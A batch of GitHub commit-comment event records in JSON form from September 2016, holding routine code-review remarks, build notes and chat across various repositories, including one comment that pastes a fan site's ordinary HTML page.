{"id":"4546158577","type":"CommitCommentEvent","actor":{"login":"elitak"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18977533,"position":null,"line":null,"path":null,"commit_id":"a3bcdc1ee0fea9b7d39e874f373ae450adcdaf86","created_at":"2016-09-11T17:08:03Z","updated_at":"2016-09-11T17:08:03Z","body":"Quicker rebuilds. Independent versioning. Availing the deps for use\nelsewhere. Smaller footprint in the binary cache and maybe the store.\nResilience against future removal of the included deps from the src\ntarball. Clarity, detail in how openocd is structured. Finally, I figured\nbeing able to build every component of every package independently was just\nThe Right Way to use Nix.\n\nI think that while it makes updating openocd more verbose, the overall\nimpact is to improve maintainability, not worsen it.\n\nOn Sep 10, 2016 3:04 PM, \"Bjørn Forsman\" <notifications@github.com> wrote:\n\n> What are the benefits of using these two deps as externals? Isn't it\n> mostly adding more moving parts and making maintenance slightly more\n> difficult?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/NixOS/nixpkgs/commit/a3bcdc1ee0fea9b7d39e874f373ae450adcdaf86#commitcomment-18975172>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAu8MZRtqFhcT_DXUrS8b5PVNY6kRXVrks5qoyltgaJpZM4J513m>\n> .\n>\n"}},"created_at":"2016-09-11T17:08:03Z"}
{"id":"4546159735","type":"CommitCommentEvent","actor":{"login":"ztombol"},"repo":{"name":"sstephenson/bats"},"payload":{"comment":{"id":18977535,"position":null,"line":null,"path":null,"commit_id":"03608115df2071fff4eaaff1605768c275e5f81f","created_at":"2016-09-11T17:08:44Z","updated_at":"2016-09-11T17:08:44Z","body":"@pporada-gl Yes, see #150.\r\n\r\n_Your comment is unrelated to this commit. Please, use the issue tracker next time. There's an issue open about this already._"}},"created_at":"2016-09-11T17:08:44Z"}
{"id":"4546161198","type":"CommitCommentEvent","actor":{"login":"mrdoob"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18977537,"position":247,"line":247,"path":"examples/js/nodes/NodeBuilder.js","commit_id":"c451cfa113fb1eb24eb2a41cd62adaa9faa3f078","created_at":"2016-09-11T17:09:40Z","updated_at":"2016-09-11T17:09:40Z","body":"I think so.\r\n/cc @sunag"}},"created_at":"2016-09-11T17:09:40Z"}
{"id":"4546163136","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977542,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:10:54Z","updated_at":"2016-09-11T17:10:54Z","body":"Why do you want to know? Use logic."}},"created_at":"2016-09-11T17:10:54Z"}
{"id":"4546163206","type":"CommitCommentEvent","actor":{"login":"akshaya93"},"repo":{"name":"akshaya93/CometCollaborate"},"payload":{"comment":{"id":18977543,"position":null,"line":null,"path":null,"commit_id":"a8b7e6acb7f32271a3ef93105eae05d1c9c77c16","created_at":"2016-09-11T17:10:58Z","updated_at":"2016-09-11T17:10:58Z","body":"Code for sending mail. We could not configure the mail client in the emulator, thus uploaded this as a separate file."}},"created_at":"2016-09-11T17:10:58Z"}
{"id":"4546163584","type":"CommitCommentEvent","actor":{"login":"mingrammer"},"repo":{"name":"geekhub-lab/commit-alarm"},"payload":{"comment":{"id":18977544,"position":null,"line":null,"path":null,"commit_id":"77fbbf2a0aed1c53c3d0a29d42ef4e1bd2a64af8","created_at":"2016-09-11T17:11:16Z","updated_at":"2016-09-11T17:11:16Z","body":"// Ignore the .idea/* files"}},"created_at":"2016-09-11T17:11:16Z"}
{"id":"4546165300","type":"CommitCommentEvent","actor":{"login":"brunodoamaral"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":18977545,"position":null,"line":null,"path":null,"commit_id":"7bcdcbbf60fc08346fd8016270a0563f4b51362b","created_at":"2016-09-11T17:12:17Z","updated_at":"2016-09-11T17:12:17Z","body":"This commit caused issue #4319 for a few users (including me). Any thoughts of the cause?"}},"created_at":"2016-09-11T17:12:17Z"}
{"id":"4546166360","type":"CommitCommentEvent","actor":{"login":"savander"},"repo":{"name":"TomaszGasior/WizyTowka"},"payload":{"comment":{"id":18977547,"position":17,"line":17,"path":"code/index.php","commit_id":"5af5daa399431fde72e6bf537a8022fb271f6597","created_at":"2016-09-11T17:13:05Z","updated_at":"2016-09-11T17:13:05Z","body":"Use \"DATA_DIR\" const, instead of \"__DIR__\""}},"created_at":"2016-09-11T17:13:05Z"}
{"id":"4546166742","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977548,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:13:19Z","updated_at":"2016-09-11T17:13:19Z","body":"I would like to know because I would like to know, it is a given. It does\nnot need proof.\n\nOn Sun, Sep 11, 2016 at 1:10 PM, Garrett Smith <notifications@github.com>\nwrote:\n\n> Why do you want to know? Use logic.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JoinRajuncraftNow/Projects/commit/b0848810b71bda3b651589fec3003d63a31d0bcd#commitcomment-18977542>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOnZth8RMQ0FpITuSbo96i7uHX8PEAks5qpDYegaJpZM4J5ZuF>\n> .\n>\n"}},"created_at":"2016-09-11T17:13:19Z"}
{"id":"4546166974","type":"CommitCommentEvent","actor":{"login":"jmullee"},"repo":{"name":"validator/validator"},"payload":{"comment":{"id":18977549,"position":55,"line":1109,"path":"build/build.py","commit_id":"b8444a5265935395f632eb9c9a6b1c3137d16ca7","created_at":"2016-09-11T17:13:27Z","updated_at":"2016-09-11T17:13:27Z","body":"note: python 2.7.3 (debian) error\r\nurlopen() got an unexpected keyword argument 'cafile'"}},"created_at":"2016-09-11T17:13:27Z"}
{"id":"4546167751","type":"CommitCommentEvent","actor":{"login":"ToadKing"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":18977550,"position":null,"line":null,"path":null,"commit_id":"2707890fe9b91e4b3326b4bf30b13ccf50d6dbb3","created_at":"2016-09-11T17:14:00Z","updated_at":"2016-09-11T17:14:00Z","body":"I did not test it since trying to get emscripten to work on Windows blew up in my face. I'll try building it from a VM and testing it out myself. I specifically tested it with Sonic 1 for the alignment issues."}},"created_at":"2016-09-11T17:14:00Z"}
{"id":"4546168243","type":"CommitCommentEvent","actor":{"login":"DzikuVx"},"repo":{"name":"iNavFlight/inav"},"payload":{"comment":{"id":18977552,"position":null,"line":null,"path":null,"commit_id":"41a7da75a61fa204835c31c0d673e1c359593bd8","created_at":"2016-09-11T17:14:19Z","updated_at":"2016-09-11T17:14:19Z","body":"Thanks, I've forgot about that"}},"created_at":"2016-09-11T17:14:19Z"}
{"id":"4546171348","type":"CommitCommentEvent","actor":{"login":"19smitgr"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977556,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:16:22Z","updated_at":"2016-09-11T17:16:22Z","body":"*sigh* never mind."}},"created_at":"2016-09-11T17:16:22Z"}
{"id":"4546172559","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977558,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:17:10Z","updated_at":"2016-09-11T17:17:10Z","body":"OH, IT'S YOU! LOL, I thought it was Alex.\n\nOn Sun, Sep 11, 2016 at 1:16 PM, Garrett Smith <notifications@github.com>\nwrote:\n\n> *sigh* never mind.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/JoinRajuncraftNow/Projects/commit/b0848810b71bda3b651589fec3003d63a31d0bcd#commitcomment-18977556>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQMOncH1sjYg5Rzs9KM6f16QXRGL6USxks5qpDdmgaJpZM4J5ZuF>\n> .\n>\n"}},"created_at":"2016-09-11T17:17:10Z"}
{"id":"4546172816","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977559,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:17:20Z","updated_at":"2016-09-11T17:17:20Z","body":"Sorry Garrett!\n\nOn Sun, Sep 11, 2016 at 1:17 PM, Zachary T <zacharacutey@gmail.com> wrote:\n\n> OH, IT'S YOU! LOL, I thought it was Alex.\n>\n> On Sun, Sep 11, 2016 at 1:16 PM, Garrett Smith <notifications@github.com>\n> wrote:\n>\n>> *sigh* never mind.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/JoinRajuncraftNow/Projects/commit/b0848810b71bda3b651589fec3003d63a31d0bcd#commitcomment-18977556>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AQMOncH1sjYg5Rzs9KM6f16QXRGL6USxks5qpDdmgaJpZM4J5ZuF>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-11T17:17:20Z"}
{"id":"4546178372","type":"CommitCommentEvent","actor":{"login":"nalimilan"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18977564,"position":4,"line":286,"path":"README.md","commit_id":"046c6eb7f896d806de3fc38da2e8c9153b2dba39","created_at":"2016-09-11T17:21:14Z","updated_at":"2016-09-11T17:21:14Z","body":"We don't actually require 7.50 (which is the latest version), right? Let's lower this version dependency."}},"created_at":"2016-09-11T17:21:14Z"}
{"id":"4546179605","type":"CommitCommentEvent","actor":{"login":"erinl1"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977566,"position":null,"line":null,"path":null,"commit_id":"1038a7ea2391912060a3849b66ca73d9ac88e88f","created_at":"2016-09-11T17:22:08Z","updated_at":"2016-09-11T17:22:08Z","body":"do you mean testing each number and then adding to a variable everytime a # is larger than five?\r\n@rickyc or i might be reading it wrong"}},"created_at":"2016-09-11T17:22:08Z"}
{"id":"4546179795","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"TeamOrion/platform_manifest"},"payload":{"comment":{"id":18977567,"position":13,"line":14,"path":"default.xml","commit_id":"7e7ca090d5a62fc50f2e6f8f0b176692ceafb235","created_at":"2016-09-11T17:22:15Z","updated_at":"2016-09-11T17:22:15Z","body":"+1 fixitnowplz"}},"created_at":"2016-09-11T17:22:15Z"}
{"id":"4546180295","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18977568,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-11T17:22:38Z","updated_at":"2016-09-11T17:22:38Z","body":"So sorry, I did not realize it was you!"}},"created_at":"2016-09-11T17:22:38Z"}
{"id":"4546181682","type":"CommitCommentEvent","actor":{"login":"anup1794"},"repo":{"name":"anup1794/array"},"payload":{"comment":{"id":18977569,"position":1,"line":1,"path":"README.md","commit_id":"8f9874b1ce312bd5c5e4db136b7b2b57d4fba5fc","created_at":"2016-09-11T17:23:41Z","updated_at":"2016-09-11T17:23:41Z","body":"this is the first"}},"created_at":"2016-09-11T17:23:41Z"}
{"id":"4546183961","type":"CommitCommentEvent","actor":{"login":"yomboprime"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18977574,"position":247,"line":247,"path":"examples/js/nodes/NodeBuilder.js","commit_id":"c451cfa113fb1eb24eb2a41cd62adaa9faa3f078","created_at":"2016-09-11T17:25:23Z","updated_at":"2016-09-11T17:25:23Z","body":"There are also some `!=` below."}},"created_at":"2016-09-11T17:25:23Z"}
{"id":"4546184635","type":"CommitCommentEvent","actor":{"login":"clash0909"},"repo":{"name":"clash0909/Tree-of-Savior-Experience-Viewer-Lua-Mod"},"payload":{"comment":{"id":18977575,"position":35,"line":35,"path":"targetinfo.lua","commit_id":"3c8489ec5adabade520bddb0f9a6281232ff3153","created_at":"2016-09-11T17:25:55Z","updated_at":"2016-09-11T17:25:55Z","body":"<html>\r\n  <head>\r\n    <meta charset=\"utf-8\">\r\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n    <meta name=\"apple-itunes-app\" content=\"app-id=1135707376\"/>\r\n\r\n    <link rel=\"apple-touch-icon\" href=\"/assets/icons/assets/icons/76x76app-374d6189ebd9361c4efdf53f2c9e776d.png\">\r\n    <link rel=\"apple-touch-icon\" sizes=\"76x76\" href=\"/assets/icons/76x76app-374d6189ebd9361c4efdf53f2c9e776d.png\">\r\n    <link rel=\"apple-touch-icon\" sizes=\"120x120\" href=\"/assets/icons/120x120app-0599eda2691134a74c40ba499d7c0174.png\">\r\n    <link rel=\"apple-touch-icon\" sizes=\"152x152\" href=\"/assets/icons/152x152app-46793503e4a1e1b69117d87d1c0bc5d7.png\">\r\n    <meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\r\n    <meta name=\"verifyownership\" content=\"13276f78f84902703c1a866ca3421716\" />\r\n    <script type=\"text/javascript\">\r\n      if (typeof navigator !== \"undefined\" && typeof document !== \"undefined\" && navigator.userAgent) {\r\n        var isAndroid = /(android)/i.test(navigator.userAgent);\r\n        var isiPhone = /iPhone|iPod/.test(navigator.userAgent) && !window.MSStream;\r\n        var missingMobileWebCookie = document.cookie.indexOf(\"mobileWeb\") === -1;\r\n        if (isAndroid) {\r\n          if (missingMobileWebCookie && window.innerWidth < 700) {\r\n            location.pathname = \"/android.html\";\r\n          }         \r\n        } else if (isiPhone) {\r\n          if (missingMobileWebCookie && window.innerWidth < 700) {\r\n            location.pathname = \"/ios.html\";\r\n          }\r\n        }\r\n      }\r\n    </script>\r\n    <base href=\"/\" />\r\n<meta name=\"pokemon-go-frontend/config/environment\" content=\"%7B%22modulePrefix%22%3A%22pokemon-go-frontend%22%2C%22environment%22%3A%22production%22%2C%22baseURL%22%3A%22/%22%2C%22locationType%22%3A%22auto%22%2C%22EmberENV%22%3A%7B%22FEATURES%22%3A%7B%7D%7D%2C%22APP%22%3A%7B%22name%22%3A%22pokemon-go-frontend%22%2C%22version%22%3A%220.0.0+1f785b3a%22%7D%2C%22apiHost%22%3A%22https%3A//api.pokecrew.com%22%2C%22googleAnalytics%22%3A%7B%22webPropertyId%22%3A%22UA-30285081-4%22%7D%2C%22stripe%22%3A%7B%22key%22%3A%22pk_live_m4pvpuhZhjpQ5Kql3GMDgm8L%22%7D%2C%22googleMap%22%3A%7B%22apiKey%22%3A%22AIzaSyCo_TqTjAkB6gKv0aKGo4ZHl7lAwMr_xV4%22%2C%22libraries%22%3A%5B%22places%22%5D%7D%2C%22something%22%3A%22test%22%2C%22exportApplicationGlobal%22%3Afalse%7D\" />\r\n<!-- EMBER_CLI_FASTBOOT_TITLE --><!-- EMBER_CLI_FASTBOOT_HEAD -->\r\n<script src=\"//maps.googleapis.com/maps/api/js?v=3&key=AIzaSyCo_TqTjAkB6gKv0aKGo4ZHl7lAwMr_xV4&libraries=places\"></script>\r\n<script>\r\n(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\r\n(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\nm=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');\r\n\r\nga('create', 'UA-30285081-4', 'auto');\r\n</script>\r\n    \r\n  </head>\r\n  <body>\r\n  <link rel=\"stylesheet\" href=\"assets/vendor-d41d8cd98f00b204e9800998ecf8427e.css\" integrity=\"sha256-47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU= sha512-z4PhNX7vuL3xVChQ1m2AB9Yg5AULVxXcg/SpIdNs6c5H0NE8XYXysP+DGNKHfuwvY7kxvUdBeoGlODJ6+SfaPg==\" >\r\n  <link rel=\"stylesheet\" href=\"assets/pokemon-go-frontend-a40a3dd0a61849b6ef48c9ab74f1a0f5.css\" integrity=\"sha256-U4Ah0lxO6o4tJWWhXZSwGR0n0p7cs09UNZGs/spqlX8= sha512-Y+v6pr3ST+sC/7CvnCK/+ut0/RCmHMD3Re7KFSAEYAvtASXHbCfacef2QRqSrFAvCUMTXmV0tw/XPbuoUQfDeQ==\" >\r\n  <link href='https://fonts.googleapis.com/css?family=Lato&subset=latin,latin-ext' rel='stylesheet' type='text/css'>\r\n  <!-- EMBER_CLI_FASTBOOT_BODY -->\r\n<script src=\"https://checkout.stripe.com/checkout.js\"></script>\r\n  \r\n\r\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no\" />\r\n  <script src=\"assets/vendor-ffe71b9cc3f80da857389a8d37e25c7d.js\" integrity=\"sha256-2bgW6p2LC9nGv7hnxaHOxLs/I9Gbp/HQn+Kp8wIfVRk= sha512-tM/nqi45VkqkUjIMfChle+C3yZ+M0GJrhqmYOrF/nSehbLH1yH1ANDpr1w087LkE9iVZG+c4CK2c7/6Ac1ttvw==\" ></script>\r\n  <script src=\"assets/pokemon-go-frontend-6322f385feb7bebc7c09f6630c81c3df.js\" integrity=\"sha256-NrfO7I4E7BDd6pTnTnAef4UjmSy0ZFq8l/RMZ35V2v4= sha512-SVbAHSwcn+jY6u/AZsplavCM04DWnUklAxWr/kNtrEXyvT3xW0k0i0DxMCgYg6a3452knWdwfrz0OvjYoxG8kQ==\" ></script>\r\n    <script>\r\n  window.intercomSettings = {\r\n    app_id: \"u64yckja\"\r\n  };\r\n</script>\r\n<script>(function(){var w=window;var ic=w.Intercom;if(typeof ic===\"function\"){ic('reattach_activator');ic('update',intercomSettings);}else{var d=document;var i=function(){i.c(arguments)};i.q=[];i.c=function(args){i.q.push(args)};w.Intercom=i;function l(){var s=d.createElement('script');s.type='text/javascript';s.async=true;s.src='https://widget.intercom.io/widget/u64yckja';var x=d.getElementsByTagName('script')[0];x.parentNode.insertBefore(s,x);}if(w.attachEvent){w.attachEvent('onload',l);}else{w.addEventListener('load',l,false);}}})()</script>\r\n<script type=\"text/javascript\" src=\"//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-57a5183a89c03e5e\"></script>\r\n    <script>\r\n      window.fbAsyncInit = function() {\r\n        FB.Event.subscribe(\r\n          'ad.loaded',\r\n          function(placementId) {\r\n            console.log('Audience Network ad loaded');\r\n          }\r\n        );\r\n        FB.Event.subscribe(\r\n          'ad.error',\r\n          function(errorCode, errorMessage, placementId) {\r\n            console.log('Audience Network error (' + errorCode + ') ' + errorMessage);\r\n          }\r\n        );\r\n      };\r\n      (function(d, s, id) {\r\n        var js, fjs = d.getElementsByTagName(s)[0];\r\n        if (d.getElementById(id)) return;\r\n        js = d.createElement(s); js.id = id;\r\n        js.src = \"//connect.facebook.net/en_US/sdk/xfbml.ad.js#xfbml=1&version=v2.5&appId=1290723827611913\";\r\n        fjs.parentNode.insertBefore(js, fjs);\r\n      }(document, 'script', 'facebook-jssdk'));\r\n    </script>\r\n  </body>\r\n</html>\r\n"}},"created_at":"2016-09-11T17:25:55Z"}
{"id":"4546186366","type":"CommitCommentEvent","actor":{"login":"yomboprime"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":18977576,"position":150,"line":139,"path":"examples/js/nodes/NodeLib.js","commit_id":"c451cfa113fb1eb24eb2a41cd62adaa9faa3f078","created_at":"2016-09-11T17:27:10Z","updated_at":"2016-09-11T17:27:10Z","body":"Also, is not missing here the call `THREE.NodeLib.add( new THREE.FunctionNode( [` ?"}},"created_at":"2016-09-11T17:27:10Z"}
{"id":"4546188387","type":"CommitCommentEvent","actor":{"login":"iammohitchhabra"},"repo":{"name":"iammohitchhabra/MTP"},"payload":{"comment":{"id":18977578,"position":6,"line":5,"path":"README.md","commit_id":"d808bdbe0a321f58e77a14c5821d743f8af4f9b3","created_at":"2016-09-11T17:28:30Z","updated_at":"2016-09-11T17:28:30Z","body":"[global]\r\nexception_verbosity=high\r\ndevice=gpu\r\n[cuda]\r\nroot=/usr/local/cuda-7.5/\r\n"}},"created_at":"2016-09-11T17:28:30Z"}
{"id":"4546192330","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"erinl1/nha-erinlee"},"payload":{"comment":{"id":18977580,"position":null,"line":null,"path":null,"commit_id":"1038a7ea2391912060a3849b66ca73d9ac88e88f","created_at":"2016-09-11T17:31:06Z","updated_at":"2016-09-11T17:31:06Z","body":"Confidence :)\n\nOn Sun, Sep 11, 2016 at 1:22 PM erinl1 <notifications@github.com> wrote:\n\n> do you mean testing each number and then adding to a variable everytime a\n> # is larger than five?\n> @rickyc <https://github.com/rickyc> or i might be reading it wrong\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/erinl1/nha-erinlee/commit/1038a7ea2391912060a3849b66ca73d9ac88e88f#commitcomment-18977566>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAG0kSgmRb57rvpxmAB06rL-N3vI8CvIks5qpDjAgaJpZM4J6DMS>\n> .\n>\n"}},"created_at":"2016-09-11T17:31:06Z"}
{"id":"4546194690","type":"CommitCommentEvent","actor":{"login":"reisenberger"},"repo":{"name":"brunolauze/Polly"},"payload":{"comment":{"id":18977581,"position":12,"line":34,"path":"src/Polly.Shared/Throttle/ThrottleEngine.cs","commit_id":"c13dae4d033de350f759cf32ac4f15f7c233f482","created_at":"2016-09-11T17:32:49Z","updated_at":"2016-09-11T17:32:49Z","body":"If the cancellation token is cancelled from elsewhere (eg it was cancelling on a timeout), this execution won't have acquired the `maxParallelizationSemaphore`, but the `finally { }` below will release it.  So it'll release a semaphore it hadn't acquired (which could lead to exceptions).  We need to avoid that.  We need to always release semaphore we acquire - but only release semaphores we acquire."}},"created_at":"2016-09-11T17:32:49Z"}
{"id":"4546198675","type":"CommitCommentEvent","actor":{"login":"barischj"},"repo":{"name":"KillianDavitt/ClassCloud"},"payload":{"comment":{"id":18977585,"position":61,"line":61,"path":"classcloud.py","commit_id":"70e644ae0b5e30ab5eb703ce708b96db003d01af","created_at":"2016-09-11T17:35:25Z","updated_at":"2016-09-11T17:35:25Z","body":"Why is `flask.jsonify(files=files)` different to `flask.jsonify(files)` on the next line?"}},"created_at":"2016-09-11T17:35:25Z"}
{"id":"4546202599","type":"CommitCommentEvent","actor":{"login":"xoorath"},"repo":{"name":"cowhi/deepatari"},"payload":{"comment":{"id":18977592,"position":null,"line":null,"path":null,"commit_id":"fc07963802f2065714bcc2874d944ac45ace5ade","created_at":"2016-09-11T17:38:01Z","updated_at":"2016-09-11T17:38:01Z","body":"Ahhhh, kills me. Removing `sphinx.ext.imgmath` fixed your build on readthedocs, and I can't figure out why. I'm trying to use imgmath too.\r\n\r\nIf you happen to recall why this was happening to you too @cowhi, I'd appreciate any pointers."}},"created_at":"2016-09-11T17:38:01Z"}
{"id":"4546203454","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"csendre/android_device_samsung_serranodsdd"},"payload":{"comment":{"id":18977594,"position":4,"line":34,"path":"BoardConfig.mk","commit_id":"aba1152fc0c7e0cd915340d1677419b5b4f09666","created_at":"2016-09-11T17:38:35Z","updated_at":"2016-09-11T17:38:35Z","body":"This can be removed in N. It's defined in serrano-common, and BOARD_GLOBAL_CFLAGS replaces it."}},"created_at":"2016-09-11T17:38:35Z"}
{"id":"4546205920","type":"CommitCommentEvent","actor":{"login":"DarthAffe"},"repo":{"name":"DarthAffe/CUE.NET"},"payload":{"comment":{"id":18977599,"position":null,"line":null,"path":null,"commit_id":"c611675355b6941a5834ba28ecba65ccca12ab83","created_at":"2016-09-11T17:40:05Z","updated_at":"2016-09-11T17:40:05Z","body":"This fixes #51 "}},"created_at":"2016-09-11T17:40:05Z"}
{"id":"4546206227","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"csendre/android_device_samsung_serranodsdd"},"payload":{"comment":{"id":18977600,"position":17,"line":17,"path":"cm.mk","commit_id":"797f00b64385d165dfa480ff6a8058d07e57ea6b","created_at":"2016-09-11T17:40:17Z","updated_at":"2016-09-11T17:40:17Z","body":"Missing a change here. Add this:\r\n\r\n# Inherit from serranoldsdd device\r\n$(call inherit-product, device/samsung/serranodsdd/device.mk)"}},"created_at":"2016-09-11T17:40:17Z"}
{"id":"4546206655","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18977601,"position":null,"line":null,"path":null,"commit_id":"5b32470e9686641c952110ba68dc93bd0b443257","created_at":"2016-09-11T17:40:34Z","updated_at":"2016-09-11T17:40:34Z","body":"To PRE."}},"created_at":"2016-09-11T17:40:34Z"}
{"id":"4546206755","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18977602,"position":null,"line":null,"path":null,"commit_id":"5b32470e9686641c952110ba68dc93bd0b443257","created_at":"2016-09-11T17:40:38Z","updated_at":"2016-09-11T17:40:38Z","body":"To PRO."}},"created_at":"2016-09-11T17:40:38Z"}
{"id":"4546208662","type":"CommitCommentEvent","actor":{"login":"BobRyan530"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18977604,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-11T17:41:51Z","updated_at":"2016-09-11T17:41:51Z","body":"Thank you. I've just installed your updated packages and things appear to be functioning now."}},"created_at":"2016-09-11T17:41:51Z"}
{"id":"4546208691","type":"CommitCommentEvent","actor":{"login":"tosan88"},"repo":{"name":"Financial-Times/coco-mongodb-backup"},"payload":{"comment":{"id":18977605,"position":12,"line":12,"path":"backup_mongodb.go","commit_id":"ba100436ef720c42dd7f7c5eb2e386a93a90b5be","created_at":"2016-09-11T17:41:53Z","updated_at":"2016-09-11T17:41:53Z","body":"Wow, nice! :+1: "}},"created_at":"2016-09-11T17:41:53Z"}
{"id":"4546211289","type":"CommitCommentEvent","actor":{"login":"mesarb"},"repo":{"name":"TheBeachLab/scylla"},"payload":{"comment":{"id":18977608,"position":4,"line":11,"path":"README.md","commit_id":"fed38638de7128f99912f60f2daa6c9a7b8dfe75","created_at":"2016-09-11T17:43:38Z","updated_at":"2016-09-11T17:43:38Z","body":"Jordi Mestre (Spain)"}},"created_at":"2016-09-11T17:43:38Z"}
{"id":"4546211477","type":"CommitCommentEvent","actor":{"login":"stubailo"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18977609,"position":33,"line":47,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-11T17:43:45Z","updated_at":"2016-09-11T17:43:45Z","body":"Thanks Oleg!"}},"created_at":"2016-09-11T17:43:45Z"}
{"id":"4546213079","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18977611,"position":7,"line":186,"path":"nixos/lib/testing.nix","commit_id":"4dcb685af940efd74a7b2b66ae917129ef232d83","created_at":"2016-09-11T17:44:51Z","updated_at":"2016-09-11T17:44:51Z","body":"https://github.com/NixOS/nixpkgs/commit/b4e2b6bc6aac50094dad02a01d34d0aaca7eb3f4"}},"created_at":"2016-09-11T17:44:51Z"}
{"id":"4546215372","type":"CommitCommentEvent","actor":{"login":"EMMANUEL15"},"repo":{"name":"EMMANUEL15/ee_t02_pilas01"},"payload":{"comment":{"id":18977612,"position":null,"line":null,"path":null,"commit_id":"44c058ca062b32301be8b8abfc284b37f9d67f09","created_at":"2016-09-11T17:46:21Z","updated_at":"2016-09-11T17:46:21Z","body":"pilas\r\n"}},"created_at":"2016-09-11T17:46:21Z"}
{"id":"4546216729","type":"CommitCommentEvent","actor":{"login":"dalelotts"},"repo":{"name":"dalelotts/angular-bootstrap-datetimepicker"},"payload":{"comment":{"id":18977614,"position":null,"line":null,"path":null,"commit_id":"79050c34c9151dc6be60c4a615a0186d0c7567ef","created_at":"2016-09-11T17:47:17Z","updated_at":"2016-09-11T17:47:17Z","body":"This should also close #302, #305"}},"created_at":"2016-09-11T17:47:17Z"}
{"id":"4546217320","type":"CommitCommentEvent","actor":{"login":"benley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18977616,"position":null,"line":null,"path":null,"commit_id":"b3d33d398c23295d10cf79448e549a034b6d619e","created_at":"2016-09-11T17:47:40Z","updated_at":"2016-09-11T17:47:40Z","body":"If removing this hack/workaround makes the build work on both darwin and linux, I'm definitely in favor of removing it.  I wish I could remember more of the details around why it was necessary in the first place!"}},"created_at":"2016-09-11T17:47:40Z"}
{"id":"4546220144","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":18977622,"position":15,"line":38,"path":"src/main/java/org/spongepowered/api/block/tileentity/carrier/Chest.java","commit_id":"9dcf0eb4b478341058fc12953256816ad4a6cb39","created_at":"2016-09-11T17:49:41Z","updated_at":"2016-09-11T17:49:41Z","body":"spacing"}},"created_at":"2016-09-11T17:49:41Z"}
